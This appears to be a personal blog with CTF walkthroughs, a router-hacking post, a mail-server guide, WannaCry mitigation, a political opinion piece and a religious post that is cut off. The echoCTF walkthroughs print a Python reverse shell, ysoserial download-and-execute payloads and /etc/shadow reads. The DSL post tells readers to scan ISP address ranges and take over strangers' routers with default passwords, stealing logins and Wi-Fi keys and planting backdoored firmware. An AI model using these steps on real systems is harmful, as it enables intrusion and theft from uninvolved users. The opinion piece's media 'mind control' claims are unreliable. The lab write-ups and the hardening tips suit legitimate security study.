[Sticky]

StackOverCTF – Walk Through – CyberTalents

This was one of the challenges in qualification round for Digital Pakistan Cyber Security Hackathon 2022.
Details:
Category: Web Security
Level: Hard
Points: 200

Steps:
Since this is a web challenge, open the CTF link in web browser (Google Chrome in our case).


The first page shows two links:
1) Post Question
2) Show Latest Question


The Post Question page shows a form with 3 input fields:
1) Question
2) Category
3) Animation


Enter aaaa in question field, bbbb in category and cccc in animation field.
On submission, this page sets a cookie in browser named latest_question with a base64 encoded string.

latest_question=rO0ABXNyACJjb....GFhYWE=

On Kali machine, decode this base64 encoded string:

echo rO0ABXNyACJjb....GFhYWE=|base64 -d

The decoded result is garbage with some readable strings that can be seen in image below:

Base64 Encoded Serialized Object
The presence of java/lang/String in above data confirms that this is basically a serialized java object.
Although the characters rO0 in the beginning of base64 data confirms that its a serialized object but we didn’t noticed that honestly.

Now when we visit the Show Latest Question page, aaaa was displayed.
It means that on this page, the cookie was being base64 decoded, un-serialized and our input question was being printed.

At this point, it was obvious that the vulnerability involved is Insecure Deserialization.
To exploit this vulnerability, one must understand the structure of the object being de-serialized.

To understand the structure of the Java object, we use a tool called SerializationDumper.

Save this object in a file and the use the tool to see the object structure:
echo rO0ABXNyACJjb....GFhYWE=|base64 -d>/tmp/obj01

Using SerializationDumper tool:
java -jar SerializationDumper-v1.13.jar -r /tmp/obj01

As we have the object structure, we need to find the vulnerable function which will lead to code execution.
Now we have two options: We can fuzz the web application by passing different code execution payloads or analyze the application further for possible clues.

On further analysis, a web directory /backup was observed with 2 Java source files:
QuestionController.java
QuestionDebug.java

The QuestionDebug.java file had what we were looking for, the vulnerable function:
Question Debug Java Source Code

Now we needed Java compiler so we could craft the QuestionDebug Java class.

We used Online Java Compiler from jdoodle.com for this purpose as we had no Java Compiler installed on our machine nor we had time for installation during the competition.
Jdoodle Crafted Java Object

After this, we had to generate and decode the final Java object.
Make sure to create the correct Java class hierarchy as show in images.
By using code from QuestionDebug.java and QuestionController.java files, we were able to create the final payload generator.
Jdoodle Java Payload Generator

The value of serialVersionUID should be kept same or the payload will not work.

Used requestbin.net as our HTTP listener so we can receive the output of code execution.

Open the Show Latest Question page in browser, which initially printed aaaa.

Open Developer Console of Chrome by pressing Ctrl+Shift+i and enter the final payload.
Google Chrome Developer Console Cookie

Refreshed the page and our payload got executed as we received the HTTP request on RequestBin.

Flag was present as flag.txt file in home directory.

The files used in this CTF can be download from here:
https://www.asktaimoor.com/stuff/ctf/stackoverctf.zip

If you have any questions, please feel free to ask in comments.

Thanks to CyberTalents for this great challenge 🙂

GroovyMolly – Walk Through – echoCTF

IP Address: 10.0.40.34
Description: You may be thinking that Groovy Molly is random but its not…
Extra Info: Try to make the server spill the beans. You will have to combine both services to make something worthwhile…

Steps:
So we start by entering the IP Address in browser, which returns nothing.

Next step we did is Nmap Scan:
nmap -Pn -T5 -n 10.0.40.34
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 15:28 Pakistan Standard Time
Nmap scan report for 10.0.40.34
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
2121/tcp open ccproxy-ftp
8080/tcp open http-proxy


Nmap done: 1 IP address (1 host up) scanned in 3.75 seconds

First, we will hit port 8080 because it looks like a web service port.
Opening http://10.0.40.34:8080/ in browser we get “Simple is not always Easy” text.
On checking the HTML source of this page, we see comments with our first flag: ETSCTF_x

This page has many other strings but after playing with GET,POST,SESSION and COOKIES, we got nothing.

Now we hit http://10.0.40.34:8080/test to get the web server details:
Apache Tomcat/10.0.0-M4

Looked up online for available exploits for this web server and found a PoC for “CVE-2020-9484”

For this exploit to work, we must have our file uploaded on the target system.

Moving on to the next port 2121, which looks like custom FTP port but lets netcat to make sure:
nc 10.0.40.34 2121

Above command returns “220 Service ready for new user.” which confirms that its FTP service.

Now we login to this FTP service anonymously using:
Username: anonymous
Password: root@localhost

Once logged in, we get two files in the FTP folder:
One is our second flag ETSCTF_xx
The other one is a “README.txt” file with the text:
Default user root directory.PWD:/opt/apache-ftpserver-1.1.1/res/home/

We now know that the FTP Server running is Apache FTP Server with version 1.1.1

Now we tried to upload files on the FTP server which gave “Permission Denied” errors means anonymous users don’t have enough rights.

Looked for Apache FTP Server 1.1.1 exploits online but nothing worked.

Downloaded Apache FTP Server 1.1.1 to see if we can get any further clues.

Looking at the configuration files, we got the default credentials:
Username: admin
Password: admin

Logging in to the FTP Server, now we can write files.

We have to generate our stager payload files that we will upload on the FTP service to make this exploit work.

On our Kali machine we create a file named “payload.sh” with the following content:
#!/usr/bin/bash
python -c 'import


socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.54",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

In the same directory, we have to run this command so we can transfer our final payload to the target server:
python -m SimpleHTTPServer 8888

Downloaded “ysoserial” and ran these commands for generating stager payload files:
java -jar ysoserial.jar Groovy1 'curl http://10.10.0.54:8888/payload.sh -o /tmp/payload.sh' > downloadPayload.session

java -jar ysoserial.jar Groovy1 ‘chmod 777 /tmp/payload.sh’ > chmodPayload.session


java -jar ysoserial.jar Groovy1 'bash /tmp/payload.sh' > executePayload.session

We changed the default transfer mode of FTP service to binary mode otherwise the exploit doesn’t work.

Run our Netcat listener on attacker machine using:
nc -nlvp 80

Uploaded these three stager payload files on FTP Server and now we run the Tomcat exploit as discussed above:
curl 'http://10.0.40.34:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/downloadPayload'

curl ‘http://10.0.40.34:8080/index.jsp’ -H ‘Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/chmodPayload’


curl 'http://10.0.40.34:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/apache-ftpserver-1.1.1/res/home/executePayload'

As soon as we run the last curl command, we get our Netcat reverse connection and guess what, Tomcat is run by default as root 🙂

Since we are root, we easily get our remaining flags using these commands:
cat /etc/passwd | grep ETSCTF -> ETSCTF_xxx
cat /etc/shadow | grep ETSCTF -> ETSCTF_xxxx
ls -lah /root/ | grep ETSCTF -> ETSCTF_xxxxx
env | grep ETSCTF -> ETSCTF_xxxxxx

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this interesting challenge 🙂

Notes:
1- Replace the “10.10.0.54” with your attacker IP Address.
3- Simple bash reverse shell variations didn’t work for some reason and only Python shell worked.
2- Had to get hint from Discord channel regarding the “binary mode” switching in FTP service.

How To Fix Google Chrome SSL Warning

Starting from September 2021, all the devices using Windows 7 and older Windows OS versions started to give “Invalid SSL Certificate Warning” messages.

As as result, most of the commonly used websites (speedtest.net for instance) stopped opening properly or not loading at all.

After trying multiple solutions online, this one worked for me on multiple Windows 7 systems.

All you need to do is download and install all these SSL CA certificates and install them one by one:
https://secure.globalsign.net/cacert/Root-R1.crt
https://letsencrypt.org/certs/lets-encrypt-r3.pem
https://letsencrypt.org/certs/isrg-root-x2.pem
https://letsencrypt.org/certs/isrgrootx1.pem

Once you have installed all these certificates, just restart your browser and you are good to go.

Now you can test by opening any website that was previously throwing errors.

If you are having any issues, feel free to ask in comments and I’ll be glad to help.

References:
https://www.stephenwagner.com/

Teotihuacan – Walk Through – echoCTF

IP Address: 10.0.30.190
Description: Just like the pyramids of Teotihuacán, this target feels like a step-pyramid
Extra Info: Just like a step-pyramid from Teotihuacán, you have to climb step-by-step until you reach the top. You have to get the following flags

Steps:
Like any other target, we start by simply entering the IP Address in browser.
Opening http://10.0.30.190/ returns a PHP code and anyone with basic PHP skills know what this code does.
Now we enter http://10.0.30.190/?hasAdminAccess=true in browser to get our first flag.
ETSCTF_x

Along with the flag, we got a message that says “The next challenge is located at switch_and_twist” and a link to http://10.0.30.190/switch_and_twist/

Now again we have a piece of PHP code but this time it requires some intermediate PHP skills to understand what this code does.

Using Postman, we have to send the below request:
http://10.0.30.190/switch_and_twist/
hmac=” ”
host=”asdasdasd”
nonce=””
Note: I had to debug this PHP code on local Apache to fully understand its logic.

Now we got our second flag ETSCTF_xx with the message “The next challenge is located at overprinting” and a link to http://10.0.30.190/overprinting/

Again, we are presented with PHP code and this time, it requires basic arithmetic knowledge along with advanced PHP understanding.

After some hit and try, playing with this PHP code on local Apache, we finally get the code required to pass this challenge.
http://10.0.30.190/overprinting/?print=print=111111

As a result, we get our third flag:
“The next challenge is located at /got_creds/ ETSCTF_xxx”

If you really know PHP well, you will notice another logic in this code and so we found another code:
http://10.0.30.190/overprinting/?print=011111

As expected, this code gives us our fourth flag:
“Awesome work, here is anothe flag for your troubles ETSCTF_xxxx”

Now we hit http://10.0.30.190/got_creds/ and get some NodeJS code.
This code is fairly simple and doesn’t require any deep NodeJS skills.

From the NodeJS code we get a link to http://10.0.30.190/got_creds/example

Upon hitting the above link, we get a JSON response with our fifth flag:
{“body”:{“ETSCTF”:”ETSCTF_xxxxx”}}

Now we have no more hints and there is something to do with this NodeJS code:
Upon close inspection, we see a call:
http.get(`http://${req.headers.host}?auth=${JSON.stringify(credentials)}`

Using Postman, we have to send request to http://10.0.30.190/got_creds/example with the “Host” header set to our attacker IP which in our case is “10.10.0.123”

Before sending the above request, we have to run a netcat listener on our attacker machine using the command:
nc -nlvp 80

As soon as we send the request from Postman, we get our sixth and final flag on netcat listener:
ETSCTF_xxxxxx

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this CTF 🙂

WannaCrypt Ransomware: Prevention and Cure

WannCry Ransomware

As they say, prevention is better than cure, so its better safe than sorry!

In this case, there is currently “no cure” so we are only left with prevention.

WannaCrypt/WannaCry/Wcry is a new ransomware which exploits the latest SMB vulnerability (MS17-010) found in Windows machines.

More details about this exploit and how it spreads are available everywhere so lets jump to the prevention part.

Since this code spreads via SMB which uses port 445, we have to close port 445 on our Windows systems.

Below are steps to close down port 445 and prevent WannaCrypt ransomware infection:

Disable NetBIOS
First of all you need to disable NetBIOS (port 137,138 and 139).

  • Got to Start menu > Control Panel and open System.
  • In Hardware tab, click the Device Manager button.
  • Click Show Hidden Devices from the View menu.
  • Expand Non-Plug And Play Drivers.
  • Right-click NetBios Over Tcpip and select Disable.
  • Close all dialogs and restart the system.
  • Uninstall SMB
    SMB uses port 139 and sometimes 445 so we need to uninstall this service.

  • Go to Start menu > Control Panel and open Network Connections.
  • One by one select your network interfaces (i.e., Local Area Network) and select Properties.
  • Select Client For Microsoft Networks and click the Uninstall button.
  • Once the uninstall finishes, select File And Printer Sharing For Microsoft Networks and click the Uninstall button.
  • Repeat these steps for all network interfaces.
  • Close all dialogs and restart the system.
  • These steps are only meant to prevent WannaCrypt to infect your system. If the system is already infected, isolate the system from network so it doesn’t infect other machines on your network and wait until the *cure* arrives.

    Best of luck 🙂

    Complete Guide: Setup Mail Server on CentOS

    Mail Server CentOS Postfix Dovecot SquirrelMail
    Background
    A few days back, I felt this need to have my own mail server setup on my VPS so that I can send and receive emails from my own email account (@AskTaimoor.com). One option I had was to setup CPanel on my VPS but it had its own issues. CPanel is costly and it comes with lots and lots of additional features. Its best for web hosting providers so its none of my use. If you are planning to setup lots of email accounts on lots of domains, you should consider buying CPanel or other commercial products. My requirement was just to setup a few email accounts on a few domains that I personally manage. Also, I always prefer Open Source solutions because of their security and community support.

    I followed tutorials on many websites but most of them were outdated and so lead to errors and other issues. After spending hours, I found this one tutorial that was much recent as compared to others but lengthy as hell. Following the steps provided there, I was able to send and receive email from a nice and simple to use web interface. Here I am writing those steps without unnecessary discussion about each and every step, the problems I faced and how I managed to fix those problems.

    Limitations
    There are a few limitations of this setup that I should point out before I start:

    • Account Management
      You cannot create, delete or modify email accounts directly from the final interface you will get. All the mail accounts map to local user accounts on the underlying Linux system.

    • Password Change
      Passwords of accounts cannot be changed for the same reason. It has to be manually changed from console or using some postfix plugins.

    • Non-Fancy Interface
      The web interface you will get is not stylish yet pretty simple and straight forward. Don’t expect a fancy looking user interface like Hotmail or Gmail.

    • Security
      Although we will be running everything with limited permissions yet there are some security problems with this setup e.g; MITM attacks.

    If you are OK with these limitations you can go ahead otherwise go for alternate solutions that I have mentioned above.

    Prerequisites

    • Basic Linux Knowledge
      If you don’t know basic Linux terminologies or the basic commands used in Linux you might feel lost. If that’s the case, seek help from a Linux pro.

    • Static IP
      Most VPS and dedicated server providers allot Static IPs. In case you don’t have one or you are setting up on your home server, this simply wont work for you.

    • SSH Access
      You must have SSH access to your server using PuTTy or other means. This is a must so that so can run commands on your server.

    • root Access
      This tutorial assumes that you are the administrator of this server. So you must have root access on your server in order to install anything at all.

    Installation Steps
    Before you start, make sure you have logged in to SSH and changed to root.

    • Hostname
      Your server’s hostname or FQDN should be the same as your mail address domain name. If you are going for [email protected], your hostname should be mydomain.com.
      To know your current hostname, type hostname in SSH.
      If its not correctly set, change it by entering hostname mydomain.com

    • hosts File
      Enter vi /etc/hosts
      Append this at the file’s end (if its not there already):
      w.x.y.z mydomain.com mydomain www.mydomain.com

    • Reverse DNS
      Your servers’s Public IP address should point to your FQDN. This is not set by default. It has to be configured from your server’s control panel usually or you will need to contact your host provider. Look for rDNS or Reverse DNS or PTR Records or Network Settings in your Server Control Panel.
      Once configured, run the command host w.x.y.z, where w.x.y.z is your server’s public IP address and the result should be:
      z.y.w.x.in-addr.arpa domain name pointer mydomain.com.

    • Setup MX Domain Records
      Add these records in your DNS manually or from your domain control panel:

      mail A w.x.y.z
      mydomain.com. MX 10 mail.mydomain.com.

      Don’t forget your to restart your DNS server if you have entered the records manually.

    • EPEL Repository
      Some components of this setup are not present in default repository. To fix that, we have to add latest EPEL Repository by typing this:

      # make sure to add the proper repo version for your system
      wget http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
      rpm -ivh epel-release-6-8.noarch.rpm

    • Disable SELinux
      To avoid mysterious errors, I suggest turning of SELinux temporarily. Enter this command to do it:
      setenforce 0

    • Setup Mail Accounts
      As pointed out above, all mail accounts point to local Linux user accounts. That means we will need to setup users on our server:

      # for setting up [email protected]
      useradd contact
      passwd contact

    • Setup Postfix
      Postfix is the backbone of this whole setup. Hence it must be installed and configured properly before going any further.

      # to make sure everything is up-to-date.
      yum update

      yum install postfix -y

      # remove sendmail as it conflicts with postfix
      yum remove sendmail -y

      # use your favorite text editor. mine is vi
      vi /etc/postfix/master.cf

      # find this line, un-comment it and change it to look like this:
      submission inet n - n - - smtpd
      -o syslog_name=postfix/submission
      -o smtpd_tls_wrappermode=no
      -o smtpd_tls_security_level = encrypt
      -o smtpd_sasl_auth_enable=yes
      -o smtpd_client_restrictions=permit_mynetworks,permit_sasl_authenticated,reject
      -o milter_macro_daemon_name=ORIGINATING

      # to tell postfix about your hostname
      vi /etc/postfix/main.cf

      # find these lines, un-comment them and change them to look like below:
      myhostname = mail.mydomain.com
      mydomain = mydomain.com
      myorigin = $mydomain
      inet_interfaces = all
      inet_protocols = all
      mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain
      mynetworks = localhost, 127.0.0.0/8, w.x.y.z
      home_mailbox = Maildir/

      # to make sure postfix runs on startup
      chkconfig postfix on

      # restart postfix
      service postfix restart

      If you see any errors on starting postfix, that means you have missed something. For error details, enter this command:
      tail -f /var/log/maillog
      Once you are running postfix without any errors, run this command to send a test email to your other email:
      mail my_email@my_isp.com
      Press Ctrl+D to send the mail.
      Now open your mail and check the Inbox or Junk/Spam folder to confirm that your test email has arrived.

    • Setup Dovecot
      yum install dovecot -y

      vi /etc/dovecot/dovecot.conf

      # find this line, un-comment it and change it to look like this:
      protocols = imap pop3 lmtp

      vi /etc/dovecot/conf.d/10-mail.conf

      # find this line, un-comment it and change it to look like this:
      mail_location = maildir:~/Maildir

      vi /etc/dovecot/conf.d/10-auth.conf

      # find these lines, un-comment them and change them to look like below:
      disable_plaintext_auth = yes
      auth_mechanisms = plain login

      vi /etc/dovecot/conf.d/10-master.conf

      # find these lines, un-comment them and change them to look like below:
      user = postfix
      group = postfix

      # run dovecot on startup
      chkconfig dovecot on

      service dovecot start

    • Setup SquirrelMail

      # run squirrelmail wizard
      cd /usr/share/squirrelmail/config/
      ./conf.pl

      # enter 1 to setup your organization details
      # again enter 1 to edit the organization details
      # enter all your details and press S to save them and finally press R to return to main menu

      # enter 2 to setup mail server details
      # again enter 1 to set your domain name (mydomain.com)
      # enter 3 and then enter 2 to change from Sendmail to SMTP

      # finally press S followed by Q to save and exit the squirrelmail wizard

    • Setup Apache
      Apache is installed on most servers by default. If not, install it by typing:

      yum install apache -y

      Once Apache is properly installed, configure it to serve SquirrelMail front-end:

      vi /etc/httpd/conf/httpd.conf

      # add the below lines at the end of line:
      Alias /webmail /usr/share/squirrelmail

      Options Indexes FollowSymLinks
      RewriteEngine On
      AllowOverride All
      DirectoryIndex index.php
      Order allow,deny
      Allow from all

      # restart apache server
      service httpd restart

      Open http://w.x.y.z/webmail in your browser and you will be greeted by SquirrelMail login page like this:
      Mail Server SquirrelMail Frontend Login
      Login with the mail account you previously created.
      If you have reached this point without any errors, pat your self as you have completed 60% of the whole setup.

    • Setup Multiple Accounts
      Postfix allows us to send and receive emails using different email addresses on different domains using a single Linux user account.
      In order to make it work, enter the following commands:

      vi /etc/postfix/main.cf

      # find these lines, un-comment them and change them to look like below:
      virtual_alias_domains = mydomain.com mypersonaldomain.net myofficaldomain.org
      virtual_alias_maps = hash:/etc/postfix/virtual

      vi /etc/postfix/virtual

      # add as many accounts you want at the end of file in this format:
      [email protected] contact
      [email protected] contact
      [email protected] contact
      [email protected] contact
      [email protected] contact

      # every time you edit the virtual file, you must run these commands:
      postmap /etc/postfix/virtual
      postfix reload

      The emails received on the above email accounts will land in the inbox of contact user account. You can setup as many accounts as you wish by mapping them to the local Linux user accounts. But setting up too many accounts is not recommended.

    • Setup SPF Records
      SPF records are used by most Email servers to prevent SPAM. If you don’t have these records chances are that all your sent emails will land in recipient’s junk/spam folder.
      Add this record in your DNS manually or from your domain control panel:

      @ TXT "v=spf1 mx a ip4:w.x.y.z"

      Don’t forget your to restart your DNS server if you have entered the records manually.

    • Setup DKIM Keys
      Just like SPF, DKIM is a mechanism designed to fight email SPAM. Failing to setup these will cause your emails to be caught up by SPAM filters or never reaching the recipients at all. Perform the following to prevent this:

      yum install opendkim -y

      vi /etc/opendkim.conf

      # append the following lines at the file's end:
      AutoRestart Yes
      AutoRestartRate 10/1h
      UMask 002
      Syslog yes
      SyslogSuccess Yes
      LogWhy Yes

      Canonicalization relaxed/simple

      ExternalIgnoreList refile:/etc/opendkim/TrustedHosts
      InternalHosts refile:/etc/opendkim/TrustedHosts
      KeyTable refile:/etc/opendkim/KeyTable
      SigningTable refile:/etc/opendkim/SigningTable

      Mode sv
      PidFile /var/run/opendkim/opendkim.pid
      SignatureAlgorithm rsa-sha256

      UserID opendkim:opendkim

      Socket inet:12301@localhost

      vi /etc/default/opendkim

      # find this line, un-comment it and change it to look like this:
      SOCKET="inet:12301@localhost"

      # configure postfix to use DKIM as mail filter
      vi /etc/postfix/main.cf

      # find these lines, un-comment them and change them to look like below:
      milter_protocol = 2
      milter_default_action = accept
      smtpd_milters = inet:localhost:12301
      non_smtpd_milters = inet:localhost:12301

      # setup dkim directory structure
      mkdir /etc/opendkim
      mkdir /etc/opendkim/keys

      # specify which hosts should be trusted
      vi /etc/opendkim/TrustedHosts

      # append the follow lines at the end of the file:
      w.x.y.z
      *.mydomain.com

      # create a key table
      vi /etc/opendkim/KeyTable

      # append this line at the end of the file:
      mail._domainkey.mydomain.com mydomain.com:mail:/etc/opendkim/keys/mydomain.com/mail.private

      # create signing table
      vi /etc/opendkim/SigningTable

      # append this line at the end of the file:
      *@mydomain.com mail._domainkey.mydomain.com

      # setup public and private keys
      cd /etc/opendkim/keys
      mkdir mydomain.com
      cd mydomain.com
      opendkim-genkey -s mail -d mydomain.com
      chown opendkim:opendkim mail.private

      # open mail.txt and copy the domain record
      vi mail.txt

      # the domain record should look like this (do not use this its just a sample):
      mail._domainkey IN TXT "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5e4Yg/0fTwxDZlDB
      8MThaqhifXvrniu6AQfBd+11zucb7ZMtEGHrutlUXC4cHCe4Xj5NoU6
      DHQOJTd6DcOt3R88Ik40mpg98EWozAL3RGTb6FifGJEg7s7WFB0x2oE
      hT/yFTwHVMOCDOnQgGvr3iftmzKGy7kMyFbVKGWDHtx9QIDAQAB"

      # restart postfix and opendkim to update the latest changes
      service postfix restart
      service opendkim restart


      Add the above copied record in your DNS manually or from your domain control panel:

      mail._domainkey IN TXT "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5e4Yg/0fTwxDZlDB
      8MThaqhifXvrniu6AQfBd+11zucb7ZMtEGHrutlUXC4cHCe4Xj5NoU6
      DHQOJTd6DcOt3R88Ik40mpg98EWozAL3RGTb6FifGJEg7s7WFB0x2oE
      hT/yFTwHVMOCDOnQgGvr3iftmzKGy7kMyFbVKGWDHtx9QIDAQAB"

      Don’t forget your to restart your DNS server if you have entered the records manually.

    Testing
    Once all the above steps are completed, its time to test your newly born mail server.

  • DNS Records
    Verify that all your DNS records are setup properly by typing this command:
    nslookup -type=ANY mydomain.com
    The result should look like below:
    Mail Server Test Nslookup Type Any
    The MX, SPF and DKIM records must be present in the results.

  • Compliance
    To make sure your email server meets the standards and follows the best practices, send an empty email to [email protected] from your SquirrelMail.
    Open http://www.allaboutspam.com/email-server-test-report/index.php in your browser and enter the email from which you sent the empty email ([email protected]) and press enter.
    All the results should be shown in green except the BATV and Greylist check. Like for SPF test, you should see this:
    Mail Server SPF Compliance Test
    Within 10 to 15 minutes, a mail will arrive in your SquirrelMail inbox containing a link ensuring your email server is using the best practices.

  • Gmail, Hotmail and Yahoo!
    Try sending email from your SquirrelMail to the most used email services to test email delivery.
    Do not enter words like “test email” “mail testing” in the subject field or email body. Doing this increases the chances of your emails landing in SPAM folder.
    Enter something creative that doesn’t look like SPAM and your emails will land safely in Gmail’s and Yahoo!’s inbox!
    However in case of Hotmail this isn’t true. Hotmail’s SmartFilter uses IP reputation in addition to other methods to identify potential SPAM. It takes take for SmartFilter before it whitelist your IP. Until then your associates will have to check their Junk folder to find your email.
    Other than that, it works fine with most email services providers worldwide.

  • Debugging
    Following the above steps, if something doesn’t work, you will need to check the following to find the culprit:
    For mail server related problems: tail -f /var/log/maillog
    For DNS server related problems: tail -f /var/named/log/queries.log
    For user authentication related problems: tail -f /var/log/secure
    For other problems: tail -f /var/log/messages

    In case you are having problems following this tutorial, just write in comments and we will sort out the problem!

  • Hacking and Securing DSL Routers

    Introduction:
    (Note: If you know how DSL works, you can jump to the next section!)
    Most of the internet users nowadays are using DSL connections. DSL stands for Digital Subscriber Line which provides internet over telephone lines. DSL uses ADSL Routers or ADSL Modems. Here is a layman diagram of how DSL works:
    how_dsl_works

    Whenever a user turns on their DSL modem, they are connected to the DSLAM which is usually placed inside ISP Exchange. Each DSLAM has the capacity to connect with thousands of DSL users. In above image, it looks like a small box but actually it is much bigger:
    dslam_backside

    DSLAM is responsible for checking the condition of telephone line and assures that a stable connection can be maintained. It also holds some properties for each telephone line. The Download and Upload Rate you see in your modem status page are also set by DSLAM. Once the DSLAM connection is established, the DSL light on some modems is turned on.
    modem_adsl_light_off

    Now the modem sends Internet Access request to the BRAS server. This request contains the DSL username and password which is saved in the DSL modem settings. The login is usually set by the lineman when they install a new DSL connection. The BRAS server is directly connected with the central RADIUS server which contains login information of all DSL users. The RADIUS server also contains a list of IP Addresses which are not used by others. If the login sent by modem is valid, RADIUS server responds with one IP Address from the IP Address list. Once the modem receives the IP Address, an internet connection is established and the internet light on modem is turned on:
    modem_adsl_internet_on

    That was some lengthy introduction about DSL and its working for non-technical people!

    How to Hack:
    After reading the above introduction we know that each DSL connection is assigned a unique Public IP address from a list. This list is basically a range of IP Addresses which is assigned to the ISP by the RIR. We can check our IP Address from here: http://myip.counterstrike.com.pk/. I assume my IP Address is 66.150.150.10. The IP Address we see is basically the IP Address assigned to our modem. What will happen if we change the last part of our IP Address and enter 66.150.150.11 it in web browser?
    ip_connect_error

    Oh. It looks like that IP Address does not belong to any DSL user. Lets try 66.150.150.11:
    router_basic_auth_page
    (Keep increasing the last number of IP Address until you hit a login page. Don’t give up too soon!)

    Looks like we have reached the login page of another DSL users’s modem. The default login for most modems is admin:admin. More default logins are given in next section. Once we login successfully, we have full control over that modem.
    For example:

    • We can steal their DSL login and use their bandwidth:
      modem_wan_ppp_settings

    • Change their DNS Servers and hijack their DNS Requests:
      modem_wifi_key_wpa_psk

    • Steal their Wi-Fi keys:
      modem_wifi_key_wpa_psk

    • Enable DMZ to remotely access internal LAN computers:
      modem_dmz_pic

    • Replace ACS with our own for remote configuration of modem:
      modem_acs_server_attacker

    • Replace modem’s firmware with our own backdoored firmware:
      modem_firmware_backdoor_update

    As you can see, we can do pretty much anything we want with that DSL Router we just owned.

    How to Secure:
    Now that we have learned about the various tricks to exploit the router, lets go through the different ways to secure it:

    • Change Default Router Configuration Password:
      If you have installed a new DSL connection, chances are that your login and password combination is one of the following default logins:
      admin:admin
      support:support
      user:user
      admin:ISP NAME
      admin:LAST 5 HEX CHARACTERS OF MODEM MAC ADDRESS+1
      Always use a strong password that does not include dictionary words.
      Some modems have multiple login accounts so make sure you have changed passwords for all of them:
      modem_default_login_pass

    • Change Default DSL Connection Password:
      Call your ISP helpline and ask them to change your DSL or Broadband or PPP account password.
      If you do not change it, someone else might use it and you will be billed for their download usage.

    • Disable Remote Access to Modem:
      This is to make sure no one can connect to your router from outside your network.
      modem_acl_services_lan_wan_ftp_tftp_snmp_http_icmp_telnet_ssh

    • Disable TR-069 Client:
      If you know how to configure your router, you don’t need your ISP to remotely access your router.
      So you can simply disable it.
      modem_acs_tr069_disable

    • Use Strong Wi-FI Password:
      Always use a strong WPA/PSK key for password. If the attacker is on LAN, means they have your Wi-Fi password, they can easily sniff your router credentials using MITM on your local network.

    • Be Smart:
      If you connect to your Wi-Fi network and the browser opens a page asking for your Wi-Fi password, beware! Someone is trying to hack your Wi-Fi password using Wi-Fi Phishing. This is a new technique and it cannot be prevented directly. All you can do is educate your friends and family about how this works so they should be cautious about these attacks.

    If you follow the above steps, no one can break in to your router remotely or locally.

    Conclusion:
    The sole purpose of writing this post was to spread awareness about security and to educate the internet users and the ISP operators about the different threats they are exposed to.
    So if you suspect that your router might be vulnerable, now is the right time to secure it.

    Better safe than sorry!

    Cyber Crime Bill in Pakistan: The Bright Side

    Cyber Crime Laws in Pakistan
    If you belong to Pakistan you might have seen the recent fuss about the “Controversial Cyber Crime Bill” that will snatch the basic rights of internet users.
    This bill will take away everything including your internet privacy, freedom of speech and liberty. Once passed, it will be a cyber apocalypse for Pakistan.
    At least this is what the media is projecting about that bill.

    bolobhi-pasha-cybercrime-bill-update
    Below are a few texts quoted from various social and mainstream media sources:

    • If you send someone a message or email without their permission, you are a criminal.
    • Posting someones image online without their consent will land you in jail.
    • It will be a crime to write anything online against government or politicians.
    • Police or any other agency will be allowed to pick anyone without arrest warrants.
    • Government will block any website they want for any reason.
    • Internet in hotels and cafes will be banned.

    A few facts to keep in mind before I go any further:

    • Criminals are now using internet as a weapon for blackmailing the vulnerable. Victims often commit suicide in serious cases. If these criminals are ever caught, they are released most of the times because there are no laws that properly define those crimes.
    • Criminals mostly use open WiFi networks and cybercafés.
    • Pakistan government has already deployed a nationwide web filter which blocks adult websites, blasphemous material and anything that seems inappropriate to them. Government has used this system to block many legitimate websites without revealing any reasons. So this is nothing new that is going to happen.
    • Government agencies have powers to arrest anyone without requiring any arrest warrants but only when it is necessary. When they have solid intelligence about illegal activities and when national security at stake.

    mind_control
    Well, this media is a paid mind control machine. They are a modern form of black magic. You pay them good and they will turn everything in your favor. From spoiling someones reputation using scandals to violent strikes, this media plays the role of a positive catalyst. I am talking about mainstream media, the TV channels and the newspapers. Social media is not that mature yet. In our case it looks like some people don’t want to see these Cyber Crime Laws implemented.
    Power of media

    More details about mind manipulation by media and the methods used can be found on these links:

    10 Strategies of Manipulation” by the Media

    Silent Weapons for Quiet Wars

    The whole point of this post is that we should not blindly believe in what we are shown by media. We must research at our own before supporting or opposing anything.

    ISLAM – WHAT IT SAYS ABOUT THE END OF THE WORLD

    786

    Brothers & Sisters;

    Since I have not seen any posts that deal with the issue of the end of the world from the point of view of what ISLAM says I have decided to bring you this summary:

    Note the following when reading this:
    1- The sequence of events noted come from the Q’uran and the Hadith (the sayings of Prophet Muhammad (SAW)
    2- Under Islam Jesus is considered a Prophet and not God.
    3- Islam includes both Judaism and Christianity. All of the Prophets from Adam, Noah, Abraham, John, Christ, and Muhammad (pbua)are considered Prophets of Islam.
    4- I am writing this with knowledge of both religions as I was Christian Catholic and have embraced Islam a few years ago.
    5- The information that appears in the Bible and the Islamic texts corroborate each other. Anyone can buy all these books and read for themselves. There are significant amount of good quality books that address this issue from the point of view of Christianity and Islam. It is just a matter of taking what matches in both religious texts to asess predictions that span more than 2000 years.
    6- As you read this you will clearly see that these events are unfolding in front of our eyes, and GOD KNOWS BEST.

    THE SEQUENCE OF EVENTS:

    1- Increasing turmoil and natural disasters, war, death and conflict. See bellow the list of signs given by the Quaran and Prophet Muhammad.

